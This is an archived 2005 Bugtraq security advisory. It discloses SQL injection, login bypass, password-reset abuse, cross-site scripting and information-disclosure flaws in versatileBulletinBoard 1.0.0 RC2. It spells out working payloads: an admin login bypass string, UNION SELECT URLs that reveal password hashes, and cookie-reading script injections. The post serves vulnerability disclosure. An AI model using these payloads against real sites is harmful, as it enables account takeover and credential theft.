versatileBulletinBoard V1.0.0 RC2 (possibly prior versions) multiple SQL injection vulnerabilities / login bypass / board takeover

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: versatileBulletinBoard V1.0.0 RC2 (possibly prior versions) multiple SQL injection vulnerabilities / login bypass / board takeover
From: rgod@xxxxxxxxxxxxx
Date: 10 Oct 2005 22:23:15 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

versatileBulletinBoard V1.0.0 RC2 (possibly prior versions)
multiple SQL Injection vulnerabilities / login bypass / cross site scripting / 
information disclosure

software:
site: http://vbb.eniki.de/


if magic_quotes_gpc off...

A)

i)SQL INJECTION / LOGIN BYPASS

you can login as admin typing;

login: ' or 1 and name='[adminname]'/*
pass: [whatever]

also you can login with the credentials/rights of any user, typing:

login: ' or 1 and name='[username]'/*
pass: [whatever]

ii) SQL INJECTION in "search this thread" feature when you surf the forum:
%')UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,pass FROM vbb_user 
where name='[admin_nickame]'/*
(you can't do it manually, input field is too small, but you can modify the 
POST...)


iii)SQL INJECTION in index.php "select" argument
http://[target]/[path]/index.php?target=viewmesg&select='UNION%20SELECT%20pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass%20FROM%20vbb_user%20where%20name='[admin_nickname]'/*
http://[target]/[path]/index.php?target=viewmesg&select='UNION%20SELECT%20ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID%20FROM%20vbb_user%20where%20name='[admin_nickname]'/*

iv)SQL INJECTION in index.php "categ" argument
http://[target]/[path]/index.php?target=forum&categ='UNION%20SELECT%200,0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20vbb_user%20where%20name='[admin_nickname]'/*

also, we have:
http://[target]/[path]/index.php?target=forum&categ='UNION%20SELECT%200,0,ID,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20vbb_user%20where%20name='[admin_nickname]'/*

(to list USER ID number of any user, this will be useful after, you will see... 
however, usually user ID for admin is "11")


v)SQL INJECTION in "to" argument when you post a private message (you need to 
login to do this):
http://[target]/[path]/index.php?target=pm&to='UNION%20SELECT%20pass%20FROM%20vbb_user%20WHERE%20name='[admin_nickname]'/*


vi)SQL INJECTION in search for posts feature:
%'UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,pass FROM vbb_user/*


vii)SQL INJECTION:
http://[target]/[path]/userlistpre.php?list='%20UNION%20SELECT%20pass,0,0,0%20FROM%20vbb_user%20WHERE%20name='[admin_name]'/*


viii) SQL INJECTION when you see a user profile:
http://[target]/[path]/index.php?target=profile&select='UNION%20SELECT%200,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20vbb_user%20where%20name='[admin_nickname]'/*


with ii), iii), iv), v), vi), vii), viii) you will see admin MD5 password hash 
at screen


ix) SQL INJECTION, you can list all users, this could be useful to dump all 
passwords from database:

http://[target]/[path]/userlistpre.php?list='%20or%20isnull(1/0)/*


to see if your installation is vulnerable just digit ' in login field, if you 
have a SQL error, it is

x) SQL INJECTION in "forgot password" feature, a user could manipulate the 
email field to send himself new passwords for any admin/user

you will receive a link like this:

http://[target]/[path]/index.php?target=setpass&u=11&ph=[your old MD5 password 
hash]

to set up a new password, but... you can call this url at any time if you have 
the hash


combinating theese issues a user can take the full control of the board, reset 
all passwords...
proof of concept exploit incoming...


B)

xi) XSS:
possible cross site scripting, you can craft a malicious url to redirect a user 
to an arbitrary location:
http://[target]/[path]/dereferrer.php?url=http://[evil_site]/[evil_script]

and you can manipulate user cookies, poc:

http://[target]/[path]/dereferrer.php?url=%25%2522><script>alert(document.cookie)</script><!--
http://[target]/[path]/imagewin.php?file=";><script>alert(document.cookie)</script>

also, you can craft malicious urls that manipulating sql queries will show some 
evil javascript, poc:

http://[target]/[path]/userlistpre.php?list='%20UNION%20SELECT%20"<script>alert(document.cookie)</script>",0,0,0%20FROM%20vbb_user/*


C)

xii) information disclosure:
this is an online utility, but to list all files and versions doesn't seem very 
safe ;)

http://[target]/[path]/getversions.php


rgod
site: http://rgod.altervista.org
mail: retrogod at aliceposta it
original advisory: http://rgod.altervista.org/versatile100RC2.html

Prev by Date: [SECURITY] [DSA 860-1] New Ruby packages fix safety bypass
Next by Date: iDEFENSE Security Advisory 10.10.05: Kaspersky Anti-Virus Engine CHM File Parser Buffer Overflow Vulnerability
Previous by thread: [SECURITY] [DSA 860-1] New Ruby packages fix safety bypass
Next by thread: iDEFENSE Security Advisory 10.10.05: Kaspersky Anti-Virus Engine CHM File Parser Buffer Overflow Vulnerability
Index(es):
- Date
- Thread